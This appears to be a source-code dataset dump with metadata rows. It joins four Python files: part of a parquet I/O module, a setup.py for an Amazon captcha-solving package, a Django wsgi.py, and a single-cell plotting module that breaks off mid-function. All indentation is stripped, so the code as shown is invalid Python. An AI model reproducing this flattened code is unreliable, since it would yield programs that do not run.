df = df.reset_index()
if none_index:
df.columns = [c if c != "index" else NONE_LABEL for c in df.columns]
index_cols = [c for c in set(df.columns).difference(real_cols)]
else:
# Not writing index - might as well drop it
df = df.reset_index(drop=True)
_to_parquet_kwargs = {
"engine",
"compression",
"write_index",
"append",
"ignore_divisions",
"partition_on",
"storage_options",
"write_metadata_file",
"compute",
}
kwargs_pass = {k: v for k, v in kwargs.items() if k not in _to_parquet_kwargs}
# Engine-specific initialization steps to write the dataset.
# Possibly create parquet metadata, and load existing stuff if appending
meta, i_offset = engine.initialize_write(
df,
fs,
path,
append=append,
ignore_divisions=ignore_divisions,
partition_on=partition_on,
division_info=division_info,
index_cols=index_cols,
**kwargs_pass
)
# Use i_offset and df.npartitions to define file-name list
filenames = ["part.%i.parquet" % (i + i_offset) for i in range(df.npartitions)]
# write parts
dwrite = delayed(engine.write_partition)
parts = [
dwrite(
d,
path,
fs,
filename,
partition_on,
write_metadata_file,
fmd=meta,
compression=compression,
index_cols=index_cols,
**kwargs_pass
)
for d, filename in zip(df.to_delayed(), filenames)
]
# single task to complete
out = delayed(lambda x: None)(parts)
if write_metadata_file:
out = delayed(engine.write_metadata)(
parts, meta, fs, path, append=append, compression=compression
)
if compute:
if compute_kwargs is None:
compute_kwargs = dict()
out = out.compute(**compute_kwargs)
return out
_ENGINES = {}
def get_engine(engine):
"""Get the parquet engine backend implementation.
Parameters
----------
engine : {'auto', 'fastparquet', 'pyarrow'}, default 'auto'
Parquet reader library to use. Defaults to fastparquet if both are
installed
Returns
-------
A dict containing a ``'read'`` and ``'write'`` function.
"""
if engine in _ENGINES:
return _ENGINES[engine]
if engine == "auto":
for eng in ["fastparquet", "pyarrow"]:
try:
return get_engine(eng)
except RuntimeError:
pass
else:
raise RuntimeError("Please install either fastparquet or pyarrow")
elif engine == "fastparquet":
import_required("fastparquet", "`fastparquet` not installed")
from .fastparquet import FastParquetEngine
_ENGINES["fastparquet"] = eng = FastParquetEngine
return eng
elif engine == "pyarrow" or engine == "arrow":
pa = import_required("pyarrow", "`pyarrow` not installed")
from .arrow import ArrowEngine
if LooseVersion(pa.__version__) < "0.13.1":
raise RuntimeError("PyArrow version >= 0.13.1 required")
_ENGINES["pyarrow"] = eng = ArrowEngine
return eng
else:
raise ValueError(
'Unsupported engine: "{0}".'.format(engine)
+ ' Valid choices include "pyarrow" and "fastparquet".'
)
#####################
# Utility Functions #
#####################
def sorted_columns(statistics):
""" Find sorted columns given row-group statistics
This finds all columns that are sorted, along with appropriate divisions
values for those columns
Returns
-------
out: List of {'name': str, 'divisions': List[str]} dictionaries
"""
if not statistics:
return []
out = []
for i, c in enumerate(statistics[0]["columns"]):
if not all(
"min" in s["columns"][i] and "max" in s["columns"][i] for s in statistics
):
continue
divisions = [c["min"]]
max = c["max"]
success = True
for stats in statistics[1:]:
c = stats["columns"][i]
if c["min"] is None:
success = False
break
if c["min"] >= max:
divisions.append(c["min"])
max = c["max"]
else:
success = False
break
if success:
divisions.append(max)
assert divisions == sorted(divisions)
out.append({"name": c["name"], "divisions": divisions})
return out
def apply_filters(parts, statistics, filters):
""" Apply filters onto parts/statistics pairs
Parameters
----------
parts: list
Tokens corresponding to row groups to read in the future
statistics: List[dict]
List of statistics for each part, including min and max values
filters: Union[List[Tuple[str, str, Any]], List[List[Tuple[str, str, Any]]]]
List of filters to apply, like ``[[('x', '=', 0), ...], ...]``. This
implements partition-level (hive) filtering only, i.e., to prevent the
loading of some row-groups and/or files.
Predicates can be expressed in disjunctive normal form (DNF). This means
that the innermost tuple describes a single column predicate. These
inner predicates are combined with an AND conjunction into a larger
predicate. The outer-most list then combines all of the combined
filters with an OR disjunction.
Predicates can also be expressed as a List[Tuple]. These are evaluated
as an AND conjunction. To express OR in predictates, one must use the
(preferred) List[List[Tuple]] notation.
Returns
-------
parts, statistics: the same as the input, but possibly a subset
"""
def apply_conjunction(parts, statistics, conjunction):
for column, operator, value in conjunction:
out_parts = []
out_statistics = []
for part, stats in zip(parts, statistics):
if "filter" in stats and stats["filter"]:
continue # Filtered by engine
try:
c = toolz.groupby("name", stats["columns"])[column][0]
min = c["min"]
max = c["max"]
except KeyError:
out_parts.append(part)
out_statistics.append(stats)
else:
if (
operator == "=="
and min <= value <= max
or operator == "<"
and min < value
or operator == "<="
and min <= value
or operator == ">"
and max > value
or operator == ">="
and max >= value
or operator == "in"
and any(min <= item <= max for item in value)
):
out_parts.append(part)
out_statistics.append(stats)
parts, statistics = out_parts, out_statistics
return parts, statistics
conjunction, *disjunction = filters if isinstance(filters[0], list) else [filters]
out_parts, out_statistics = apply_conjunction(parts, statistics, conjunction)
for conjunction in disjunction:
for part, stats in zip(*apply_conjunction(parts, statistics, conjunction)):
if part not in out_parts:
out_parts.append(part)
out_statistics.append(stats)
return out_parts, out_statistics
def process_statistics(parts, statistics, filters, index, chunksize):
"""Process row-group column statistics in metadata
Used in read_parquet.
"""
index_in_columns = False
if statistics:
result = list(
zip(
*[
(part, stats)
for part, stats in zip(parts, statistics)
if stats["num-rows"] > 0
]
)
)
parts, statistics = result or [[], []]
if filters:
parts, statistics = apply_filters(parts, statistics, filters)
# Aggregate parts/statistics if we are splitting by row-group
if chunksize:
parts, statistics = aggregate_row_groups(parts, statistics, chunksize)
out = sorted_columns(statistics)
if index and isinstance(index, str):
index = [index]
if index and out:
# Only one valid column
out = [o for o in out if o["name"] in index]
if index is not False and len(out) == 1:
# Use only sorted column with statistics as the index
divisions = out[0]["divisions"]
if index is None:
index_in_columns = True
index = [out[0]["name"]]
elif index != [out[0]["name"]]:
raise ValueError("Specified index is invalid.\nindex: {}".format(index))
elif index is not False and len(out) > 1:
if any(o["name"] == NONE_LABEL for o in out):
# Use sorted column maching NONE_LABEL as the index
[o] = [o for o in out if o["name"] == NONE_LABEL]
divisions = o["divisions"]
if index is None:
index = [o["name"]]
index_in_columns = True
elif index != [o["name"]]:
raise ValueError(
"Specified index is invalid.\nindex: {}".format(index)
)
else:
# Multiple sorted columns found, cannot autodetect the index
warnings.warn(
"Multiple sorted columns found %s, cannot\n "
"autodetect index. Will continue without an index.\n"
"To pick an index column, use the index= keyword; to \n"
"silence this warning use index=False."
"" % [o["name"] for o in out],
RuntimeWarning,
)
index = False
divisions = [None] * (len(parts) + 1)
else:
divisions = [None] * (len(parts) + 1)
else:
divisions = [None] * (len(parts) + 1)
return parts, divisions, index, index_in_columns
def set_index_columns(meta, index, columns, index_in_columns, auto_index_allowed):
"""Handle index/column arguments, and modify `meta`
Used in read_parquet.
"""
ignore_index_column_intersection = False
if columns is None:
# User didn't specify columns, so ignore any intersection
# of auto-detected values with the index (if necessary)
ignore_index_column_intersection = True
columns = [c for c in meta.columns]
if not set(columns).issubset(set(meta.columns)):
raise ValueError(
"The following columns were not found in the dataset %s\n"
"The following columns were found %s"
% (set(columns) - set(meta.columns), meta.columns)
)
if index:
if isinstance(index, str):
index = [index]
if isinstance(columns, str):
columns = [columns]
if ignore_index_column_intersection:
columns = [col for col in columns if col not in index]
if set(index).intersection(columns):
if auto_index_allowed:
raise ValueError(
"Specified index and column arguments must not intersect"
" (set index=False or remove the detected index from columns).\n"
"index: {} | column: {}".format(index, columns)
)
else:
raise ValueError(
"Specified index and column arguments must not intersect.\n"
"index: {} | column: {}".format(index, columns)
)
# Leaving index as a column in `meta`, because the index
# will be reset below (in case the index was detected after
# meta was created)
if index_in_columns:
meta = meta[columns + index]
else:
meta = meta[columns]
else:
meta = meta[list(columns)]
return meta, index, columns
def aggregate_row_groups(parts, stats, chunksize):
if not stats[0].get("file_path_0", None):
return parts, stats
parts_agg = []
stats_agg = []
chunksize = parse_bytes(chunksize)
next_part, next_stat = [parts[0].copy()], stats[0].copy()
for i in range(1, len(parts)):
stat, part = stats[i], parts[i]
if (stat["file_path_0"] == next_stat["file_path_0"]) and (
(next_stat["total_byte_size"] + stat["total_byte_size"]) <= chunksize
):
# Update part list
next_part.append(part)
# Update Statistics
next_stat["total_byte_size"] += stat["total_byte_size"]
next_stat["num-rows"] += stat["num-rows"]
for col, col_add in zip(next_stat["columns"], stat["columns"]):
if col["name"] != col_add["name"]:
raise ValueError("Columns are different!!")
if "null_count" in col:
col["null_count"] += col_add["null_count"]
if "min" in col:
col["min"] = min(col["min"], col_add["min"])
if "max" in col:
col["max"] = max(col["max"], col_add["max"])
else:
parts_agg.append(next_part)
stats_agg.append(next_stat)
next_part, next_stat = [part.copy()], stat.copy()
parts_agg.append(next_part)
stats_agg.append(next_stat)
return parts_agg, stats_agg
DataFrame.to_parquet.__doc__ = to_parquet.__doc__
| 35.072464
| 88
| 0.594077
|
934bce7625279182c9b6822780a8445933b338b6
| 2,270
|
py
|
Python
|
setup.py
|
a-maliarov/Amazon-Captcha-Solver
|
085b203951e77b08da10edf4dbd172375bf4a098
|
[
"MIT"
] | 43
|
2020-05-22T12:49:30.000Z
|
2020-10-13T07:52:42.000Z
|
setup.py
|
a-maliarov/Amazon-Captcha-Solver
|
085b203951e77b08da10edf4dbd172375bf4a098
|
[
"MIT"
] | 22
|
2020-09-12T14:40:48.000Z
|
2020-10-14T04:22:53.000Z
|
setup.py
|
a-maliarov/Amazon-Captcha-Solver
|
085b203951e77b08da10edf4dbd172375bf4a098
|
[
"MIT"
] | 7
|
2020-05-29T03:09:52.000Z
|
2020-10-13T08:24:21.000Z
|
# -*- coding: utf-8 -*-
import setuptools
import os
#--------------------------------------------------------------------------------------------------------------
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'amazoncaptcha', '__version__.py'), 'r', encoding='utf-8') as f:
file_data = [i.replace('\n', '').replace('\'', '').split(' = ') for i in f.readlines()]
about = {k: v for k, v in file_data}
def readme(logo_end_line=14):
"""Extracts the logo from README file before pushing to PyPi."""
with open('README.md', 'r', encoding='utf-8') as fh:
long_description = ''.join(fh.readlines()[logo_end_line:])
return long_description
classifiers = [
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Development Status :: 5 - Production/Stable",
"Natural Language :: English",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Information Technology",
]
requires = [
"pillow >= 9.0.1,< 9.2.0",
"requests ~= 2.27.1"
]
#--------------------------------------------------------------------------------------------------------------
setuptools.setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
packages=['amazoncaptcha'],
py_modules=['devtools', 'exceptions', 'solver', 'utils'],
include_package_data=True,
package_data={'': ['*.json'], 'amazoncaptcha': ['training_data/*.*']},
classifiers=classifiers,
long_description=readme(),
long_description_content_type="text/markdown",
install_requires=requires,
author=about['__author__'],
author_email=about['__author_email__'],
url=about['__url__'],
project_urls={
'Documentation': 'https://amazoncaptcha.readthedocs.io/en/latest/',
'Source': about['__url__'],
},
)
#--------------------------------------------------------------------------------------------------------------
| 34.923077
| 112
| 0.528634
|
c539ce35d1e36dd53f85195b5598a2ef9826ebc1
| 403
|
py
|
Python
|
edge_shipment/edge_shipment/wsgi.py
|
2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Edge-Shipment
|
f84afef077a03ed9ade7426785770dcc0c4023d6
|
[
"Apache-2.0"
] | null | null | null |
edge_shipment/edge_shipment/wsgi.py
|
2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Edge-Shipment
|
f84afef077a03ed9ade7426785770dcc0c4023d6
|
[
"Apache-2.0"
] | null | null | null |
edge_shipment/edge_shipment/wsgi.py
|
2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Edge-Shipment
|
f84afef077a03ed9ade7426785770dcc0c4023d6
|
[
"Apache-2.0"
] | null | null | null |
"""
WSGI config for edge_shipment project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'edge_shipment.settings')
application = get_wsgi_application()
| 23.705882
| 78
| 0.791563
|
7b9d97b685e3ae933a7b2400439b25b605904c36
| 34,382
|
py
|
Python
|
scarf/plots.py
|
razofz/scarf-1
|
2c97ed6d9433ff95154ce8b26f382139a708207d
|
[
"BSD-3-Clause"
] | 1
|
2021-08-07T20:55:08.000Z
|
2021-08-07T20:55:08.000Z
|
scarf/plots.py
|
razofz/scarf-1
|
2c97ed6d9433ff95154ce8b26f382139a708207d
|
[
"BSD-3-Clause"
] | null | null | null |
scarf/plots.py
|
razofz/scarf-1
|
2c97ed6d9433ff95154ce8b26f382139a708207d
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Contains the code for plotting in Scarf.
"""
import matplotlib.pyplot as plt
import matplotlib as mpl
import seaborn as sns
import numpy as np
import pandas as pd
from typing import Tuple, Optional
from cmocean import cm
from .utils import logger
plt.rcParams["svg.fonttype"] = "none"
# These palettes were lifted from scanpy.plotting.palettes
custom_palettes = {
10: [
"#1f77b4",
"#ff7f0e",
"#279e68",
"#d62728",
"#aa40fc",
"#8c564b",
"#e377c2",
"#7f7f7f",
"#b5bd61",
"#17becf",
],
20: [
"#1f77b4",
"#aec7e8",
"#ff7f0e",
"#ffbb78",
"#2ca02c",
"#98df8a",
"#d62728",
"#ff9896",
"#9467bd",
"#c5b0d5",
"#8c564b",
"#c49c94",
"#e377c2",
"#f7b6d2",
"#7f7f7f",
"#c7c7c7",
"#bcbd22",
"#dbdb8d",
"#17becf",
"#9edae5",
],
28: [
"#023fa5",
"#7d87b9",
"#bec1d4",
"#d6bcc0",
"#bb7784",
"#8e063b",
"#4a6fe3",
"#8595e1",
"#b5bbe3",
"#e6afb9",
"#e07b91",
"#d33f6a",
"#11c638",
"#8dd593",
"#c6dec7",
"#ead3c6",
"#f0b98d",
"#ef9708",
"#0fcfc0",
"#9cded6",
"#d5eae7",
"#f3e1eb",
"#f6c4e1",
"#f79cd4",
"#7f7f7f",
"#c7c7c7",
"#1CE6FF",
"#336600",
],
102: [
"#FFFF00",
"#1CE6FF",
"#FF34FF",
"#FF4A46",
"#008941",
"#006FA6",
"#A30059",
"#FFDBE5",
"#7A4900",
"#0000A6",
"#63FFAC",
"#B79762",
"#004D43",
"#8FB0FF",
"#997D87",
"#5A0007",
"#809693",
"#6A3A4C",
"#1B4400",
"#4FC601",
"#3B5DFF",
"#4A3B53",
"#FF2F80",
"#61615A",
"#BA0900",
"#6B7900",
"#00C2A0",
"#FFAA92",
"#FF90C9",
"#B903AA",
"#D16100",
"#DDEFFF",
"#000035",
"#7B4F4B",
"#A1C299",
"#300018",
"#0AA6D8",
"#013349",
"#00846F",
"#372101",
"#FFB500",
"#C2FFED",
"#A079BF",
"#CC0744",
"#C0B9B2",
"#C2FF99",
"#001E09",
"#00489C",
"#6F0062",
"#0CBD66",
"#EEC3FF",
"#456D75",
"#B77B68",
"#7A87A1",
"#788D66",
"#885578",
"#FAD09F",
"#FF8A9A",
"#D157A0",
"#BEC459",
"#456648",
"#0086ED",
"#886F4C",
"#34362D",
"#B4A8BD",
"#00A6AA",
"#452C2C",
"#636375",
"#A3C8C9",
"#FF913F",
"#938A81",
"#575329",
"#00FECF",
"#B05B6F",
"#8CD0FF",
"#3B9700",
"#04F757",
"#C8A1A1",
"#1E6E00",
"#7900D7",
"#A77500",
"#6367A9",
"#A05837",
"#6B002C",
"#772600",
"#D790FF",
"#9B9700",
"#549E79",
"#FFF69F",
"#201625",
"#72418F",
"#BC23FF",
"#99ADC0",
"#3A2465",
"#922329",
"#5B4534",
"#FDE8DC",
"#404E55",
"#0089A3",
"#CB7E98",
"#A4E804",
"#324E72",
],
}
def clean_axis(ax, ts=11, ga=0.4):
"""
Cleans a given matplotlib axis.
"""
ax.xaxis.set_tick_params(labelsize=ts)
ax.yaxis.set_tick_params(labelsize=ts)
for i in ["top", "bottom", "left", "right"]:
ax.spines[i].set_visible(False)
ax.grid(which="major", linestyle="--", alpha=ga)
ax.figure.patch.set_alpha(0)
ax.patch.set_alpha(0)
return True
def plot_graph_qc(g):
# TODO: add docstring description. Is this for qc of a graph, or for plotting a qc plot of a graph?
_, axis = plt.subplots(1, 2, figsize=(12, 4))
ax = axis[0]
x = np.array((g != 0).sum(axis=0))[0]
y = pd.Series(x).value_counts().sort_index()
ax.bar(y.index, y.values, width=0.5)
xlim = np.percentile(x, 99.5) + 5
ax.set_xlim((0, xlim))
ax.set_xlabel("Node degree")
ax.set_ylabel("Frequency")
ax.text(
xlim,
y.values.max(),
f"plot is clipped (max degree: {y.index.max()})",
ha="right",
fontsize=9,
)
clean_axis(ax)
ax = axis[1]
ax.hist(g.data, bins=30)
ax.set_xlabel("Edge weight")
ax.set_ylabel("Frequency")
clean_axis(ax)
plt.tight_layout()
plt.show()
def plot_qc(
data: pd.DataFrame,
color: str = "steelblue",
cmap: str = "tab20",
fig_size: tuple = None,
label_size: float = 10.0,
title_size: float = 10,
sup_title: str = None,
sup_title_size: float = 12,
scatter_size: float = 1.0,
max_points: int = 10000,
show_on_single_row: bool = True,
show_fig: bool = True,
):
# TODO: add docstring description. Is this for qc of a plot, or for plotting a qc plot?
n_plots = data.shape[1] - 1
n_groups = data["groups"].nunique()
if n_groups > 5 and show_on_single_row is True:
logger.info(
f"Too many groups in the plot. If you think that plot is too wide then consider turning "
f"`show_on_single_row` parameter to False"
)
if show_on_single_row is True:
n_rows = 1
n_cols = n_plots
else:
n_rows = n_plots
n_cols = 1
if fig_size is None:
fig_width = min(15, n_groups + (2 * n_cols))
fig_height = 1 + 2.5 * n_rows
fig_size = (fig_width, fig_height)
fig = plt.figure(figsize=fig_size)
grouped = data.groupby("groups")
for i in range(n_plots):
if data.columns[i] == "groups":
continue
vals = {"g": [], "v": []}
for j in sorted(data["groups"].unique()):
val = grouped.get_group(j)[data.columns[i]].values
vals["g"].extend([j for _ in range(len(val))])
vals["v"].extend(list(val))
vals = pd.DataFrame(vals)
ax = fig.add_subplot(n_rows, n_cols, i + 1)
if n_groups == 1:
sns.violinplot(
y="v",
x="g",
data=vals,
linewidth=1,
orient="v",
alpha=0.6,
inner=None,
cut=0,
color=color,
)
else:
sns.violinplot(
y="v",
x="g",
data=vals,
linewidth=1,
orient="v",
alpha=0.6,
inner=None,
cut=0,
palette=cmap,
)
if len(vals) > max_points:
sns.stripplot(
x="g",
y="v",
data=vals.sample(n=max_points),
jitter=0.4,
ax=ax,
orient="v",
s=scatter_size,
color="k",
alpha=0.4,
)
else:
sns.stripplot(
x="g",
y="v",
data=vals,
jitter=0.4,
ax=ax,
orient="v",
s=scatter_size,
color="k",
alpha=0.4,
)
ax.set_ylabel(data.columns[i], fontsize=label_size)
ax.set_xlabel("")
if n_groups == 1:
ax.set_xticks([])
ax.set_xticklabels([])
if data["groups"].nunique() == 1:
ax.set_title(
"Median: %.1f" % (int(np.median(vals["v"]))), fontsize=title_size
)
# clean_axis(ax)
ax.figure.patch.set_alpha(0)
ax.patch.set_alpha(0)
fig.suptitle(sup_title, fontsize=sup_title_size)
plt.tight_layout()
if show_fig:
plt.show()
else:
return fig
def plot_mean_var(
nzm: np.ndarray,
fv: np.ndarray,
n_cells: np.ndarray,
hvg: np.ndarray,
ax_label_fs: float = 12,
fig_size: Tuple[float, float] = (4.5, 4.0),
ss: Tuple[float, float] = (3, 30),
cmaps: Tuple[str, str] = ("winter", "magma_r"),
):
"""
Shows a mean-variance plot.
"""
_, ax = plt.subplots(1, 1, figsize=fig_size)
nzm = np.log2(nzm)
fv = np.log2(fv)
ax.scatter(nzm[~hvg], fv[~hvg], alpha=0.6, c=n_cells[~hvg], cmap=cmaps[0], s=ss[0])
ax.scatter(
nzm[hvg],
fv[hvg],
alpha=0.8,
c=n_cells[hvg],
cmap=cmaps[1],
s=ss[1],
edgecolor="k",
lw=0.5,
)
ax.set_xlabel("Log mean non-zero expression", fontsize=ax_label_fs)
ax.set_ylabel("Log corrected variance", fontsize=ax_label_fs)
clean_axis(ax)
plt.tight_layout()
plt.show()
def plot_elbow(var_exp, figsize: Tuple[float, float] = (None, 2)):
from kneed import KneeLocator
x = range(len(var_exp))
kneedle = KneeLocator(x, var_exp, S=1.0, curve="convex", direction="decreasing")
if figsize[0] is None:
figsize = (0.25 * len(var_exp), figsize[1])
fig, ax = plt.subplots(1, 1, figsize=figsize)
ax.plot(x, var_exp, lw=1)
ax.set_xticks(x)
ax.axvline(kneedle.elbow, lw=1, c="r", label="Elbow")
ax.set_ylabel("% Variance explained", fontsize=9)
ax.set_xlabel("Principal components", fontsize=9)
clean_axis(ax, ts=8)
ax.legend(frameon=False, fontsize=9)
plt.tight_layout()
plt.show()
def plot_heatmap(
cdf,
fontsize: float = 10,
width_factor: float = 0.03,
height_factor: float = 0.02,
cmap=cm.matter_r,
savename: str = None,
save_dpi: int = 300,
figsize=None,
show_fig: bool = True,
):
"""
Shows a heatmap plot.
"""
if figsize is None:
figsize = (
cdf.shape[1] * fontsize * width_factor,
fontsize * cdf.shape[0] * height_factor,
)
cgx = sns.clustermap(
cdf,
yticklabels=cdf.index,
xticklabels=cdf.columns,
method="ward",
figsize=figsize,
cmap=cmap,
rasterized=True,
)
cgx.ax_heatmap.set_yticklabels(
cdf.index[cgx.dendrogram_row.reordered_ind], fontsize=fontsize
)
cgx.ax_heatmap.set_xticklabels(
cdf.columns[cgx.dendrogram_col.reordered_ind], fontsize=fontsize
)
cgx.ax_heatmap.figure.patch.set_alpha(0)
cgx.ax_heatmap.patch.set_alpha(0)
if savename:
plt.savefig(savename, dpi=save_dpi)
if show_fig:
plt.show()
else:
return cgx
def _scatter_fix_type(v: pd.Series, ints_as_cats: bool) -> pd.Series:
vt = v.dtype
if v.nunique() == 1:
return pd.Series(np.ones(len(v)), index=v.index).astype(np.float_)
if vt in [np.bool_]:
# converting first to int to handle bool
return v.astype(np.int_).astype("category")
if vt in [str, object] or vt.name == "category":
return v.astype("category")
elif np.issubdtype(vt.type, np.integer) and ints_as_cats:
if v.nunique() > 100:
logger.warning("Too many categories. set force_ints_as_cats to false")
return v.astype(np.int_).astype("category")
else:
return v.astype(np.float_)
def _scatter_fix_mask(v: pd.Series, mask_vals: list, mask_name: str) -> pd.Series:
if mask_vals is None:
mask_vals = []
mask_vals += [np.NaN]
iscat = False
if v.dtype.name == "category":
iscat = True
v = v.astype(object)
# There is a bug in pandas which causes failure above 1M rows
# v[v.isin(mask_vals)] = mask_name
v[np.isin(v, mask_vals)] = mask_name
if iscat:
v = v.astype("category")
return v
def _scatter_make_colors(
v: pd.Series, cmap, color_key: Optional[dict], mask_color: str, mask_name: str
):
from matplotlib.cm import get_cmap
na_idx = v == mask_name
uv = v[~na_idx].unique()
if v.dtype.name != "category":
if cmap is None:
return cm.deep, None
else:
return get_cmap(cmap), None
else:
if cmap is None:
cmap = "custom"
if color_key is not None:
for i in uv:
if i not in color_key:
raise KeyError(f"ERROR: key {i} missing in `color_key`")
if na_idx.sum() > 0:
if mask_name not in color_key:
color_key[mask_name] = mpl.colors.to_hex(mask_color)
return None, color_key
else:
if cmap == "custom":
if len(uv) <= 10:
pal = custom_palettes[10]
elif len(uv) <= 20:
pal = custom_palettes[20]
elif len(uv) <= 30:
pal = custom_palettes[28]
else:
pal = custom_palettes[102]
else:
pal = sns.color_palette(cmap, n_colors=len(uv)).as_hex()
color_key = dict(zip(sorted(uv), pal))
if na_idx.sum() > 0:
color_key[mask_name] = mpl.colors.to_hex(mask_color)
return None, color_key
def _scatter_cleanup(ax, sw: float, sc: str, ds: tuple) -> None:
for i in ["bottom", "left", "top", "right"]:
spine = ax.spines[i]
if i in ds:
spine.set_visible(True)
spine.set_linewidth(sw)
spine.set_edgecolor(sc)
else:
spine.set_visible(False)
ax.figure.patch.set_alpha(0)
ax.patch.set_alpha(0)
ax.set_aspect("auto")
return None
def _scatter_label_axis(df, ax, fs: float, fo: float):
x, y = df.columns[:2]
ax.set_xlabel(x, fontsize=fs)
ax.set_ylabel(y, fontsize=fs)
vmin, vmax = df[x].min(), df[x].max()
ax.set_xlim((vmin - abs(vmin * fo), vmax + abs(vmax * fo)))
vmin, vmax = df[y].min(), df[y].max()
ax.set_ylim((vmin - abs(vmin * fo), vmax + abs(vmax * fo)))
ax.set_xticks([])
ax.set_yticks([])
return None
def _scatter_legends(
df,
ax,
cmap,
ck,
ondata: bool,
onside: bool,
fontsize: float,
n_per_col: int,
scale: float,
ls: float,
cs: float,
cbs: float,
) -> None:
"""
Args:
df: dataframe
ax: axis object
cmap: color map
ck: color key
ondata: display legend over scatter plot?
onside: display legend on side?
fontsize: fontsize of legend text
n_per_col: number of legends per column
scale: scale legend marker size
ls: line spacing
cs: column spacing
cbs: Cbar shrink factor
Returns:
"""
from matplotlib.colors import Normalize
from matplotlib.colorbar import ColorbarBase, make_axes_gridspec
x, y, vc = df.columns[:3]
v = df[vc]
cax = make_axes_gridspec(ax, location="top", shrink=cbs, aspect=25, fraction=0.1)[0]
if v.nunique() <= 1:
cax.set_axis_off()
return None
if v.dtype.name == "category":
ax.title.set_text(vc)
centers = df[[x, y, vc]].groupby(vc).median().T
for i in centers:
if ondata:
ax.text(
centers[i][x],
centers[i][y],
i,
fontsize=fontsize,
ha="center",
va="center",
)
if onside:
ax.scatter(
[float(centers[i][x])],
[float(centers[i][y])],
c=ck[i],
label=i,
alpha=1,
s=0.01,
)
if onside:
n_cols = v.nunique() // n_per_col
if v.nunique() % n_per_col > 0:
n_cols += 1
ax.legend(
ncol=n_cols,
loc=(1, 0),
frameon=False,
fontsize=fontsize,
markerscale=scale,
labelspacing=ls,
columnspacing=cs,
)
cax.set_axis_off()
else:
norm = Normalize(vmin=v.min(), vmax=v.max())
cb = ColorbarBase(cax, cmap=cmap, norm=norm, orientation="horizontal")
cb.set_label(vc, fontsize=fontsize)
cb.ax.xaxis.set_label_position("bottom")
cb.ax.xaxis.set_ticks_position("top")
cb.outline.set_visible(False)
return None
def _make_grid(width, height, w_pad, h_pad, n_panels, n_columns):
n_columns = np.minimum(n_panels, n_columns)
n_rows = np.ceil(n_panels / n_columns).astype(int)
if w_pad is None and h_pad is None:
constrained = True
else:
constrained = False
fig, axes = plt.subplots(
n_rows,
n_columns,
figsize=(width * n_columns, height * n_rows),
squeeze=False,
constrained_layout=constrained,
)
diff = (n_rows * n_columns) - n_panels
while diff > 0:
fig.delaxes(axes[n_rows - 1, n_columns - diff])
diff -= 1
if not constrained:
plt.tight_layout(w_pad=w_pad, h_pad=h_pad)
return fig, axes
def _create_axes(dfs, in_ax, width, height, w_pad, h_pad, n_columns):
if len(dfs) > 1:
if in_ax is not None:
logger.warning(
f"'in_ax' will not be used as multiple attributes will be plotted. Using internal grid"
f"layout"
)
_, axs = _make_grid(width, height, w_pad, h_pad, len(dfs), n_columns)
else:
if in_ax is None:
_, axs = plt.subplots(1, 1, figsize=(width, height), squeeze=False)
else:
axs = in_ax
return axs
def _iter_dataframes(dfs, mask_values, mask_name, force_ints_as_cats):
for n, df in enumerate(dfs):
vc = df.columns[2]
v = _scatter_fix_mask(df[vc].copy(), mask_values, mask_name)
df[vc] = _scatter_fix_type(v, force_ints_as_cats)
yield n, df
def plot_scatter(
dfs,
in_ax=None,
width: float = 6,
height: float = 6,
default_color: str = "steelblue",
color_map=None,
color_key: dict = None,
mask_values: list = None,
mask_name: str = "NA",
mask_color: str = "k",
point_size: float = 10,
ax_label_size: float = 12,
frame_offset: float = 0.05,
spine_width: float = 0.5,
spine_color: str = "k",
displayed_sides: tuple = ("bottom", "left"),
legend_ondata: bool = True,
legend_onside: bool = True,
legend_size: float = 12,
legends_per_col: int = 20,
cbar_shrink: float = 0.6,
marker_scale: float = 70,
lspacing: float = 0.1,
cspacing: float = 1,
savename: str = None,
dpi: int = 300,
force_ints_as_cats: bool = True,
n_columns: int = 4,
w_pad: float = 1,
h_pad: float = 1,
show_fig: bool = True,
scatter_kwargs: dict = None,
):
"""
Shows scatter plots. If more then one dataframe is provided it will place the scatterplots in a grid.
"""
from matplotlib.colors import to_hex
def _handle_scatter_kwargs(sk):
if sk is None:
sk = {}
if "c" in sk:
logger.warning("scatter_kwarg value `c` will be ignored")
del sk["c"]
if "s" in sk:
logger.warning("scatter_kwarg value `s` will be ignored")
del sk["s"]
if "lw" not in sk:
sk["lw"] = 0.1
if "edgecolors" not in sk:
sk["edgecolors"] = "k"
return sk
axs = _create_axes(dfs, in_ax, width, height, w_pad, h_pad, n_columns)
for n, df in _iter_dataframes(dfs, mask_values, mask_name, force_ints_as_cats):
v = df[df.columns[2]]
col_map, col_key = _scatter_make_colors(
v, color_map, color_key, mask_color, mask_name
)
if v.dtype.name == "category":
df["c"] = [col_key[x] for x in v]
else:
if v.nunique() == 1:
df["c"] = [default_color for _ in v]
else:
v = v.copy().fillna(0)
mmv = (v - v.min()) / (v.max() - v.min())
df["c"] = [to_hex(col_map(x)) for x in mmv]
if "s" not in df:
df["s"] = [point_size for _ in df.index]
scatter_kwargs = _handle_scatter_kwargs(sk=scatter_kwargs)
ax = axs[int(n / n_columns), n % n_columns]
ax.scatter(
df.values[:, 0],
df.values[:, 1],
c=df["c"].values,
s=df["s"].values,
rasterized=True,
**scatter_kwargs,
)
_scatter_label_axis(df, ax, ax_label_size, frame_offset)
_scatter_cleanup(ax, spine_width, spine_color, displayed_sides)
_scatter_legends(
df,
ax,
col_map,
col_key,
legend_ondata,
legend_onside,
legend_size,
legends_per_col,
marker_scale,
lspacing,
cspacing,
cbar_shrink,
)
if savename:
plt.savefig(savename, dpi=dpi, bbox_inches="tight")
if show_fig:
plt.show()
else:
return axs
def shade_scatter(
dfs,
in_ax=None,
figsize: float = 6,
pixels: int = 1000,
spread_px: int = 1,
spread_threshold: float = 0.2,
min_alpha: int = 10,
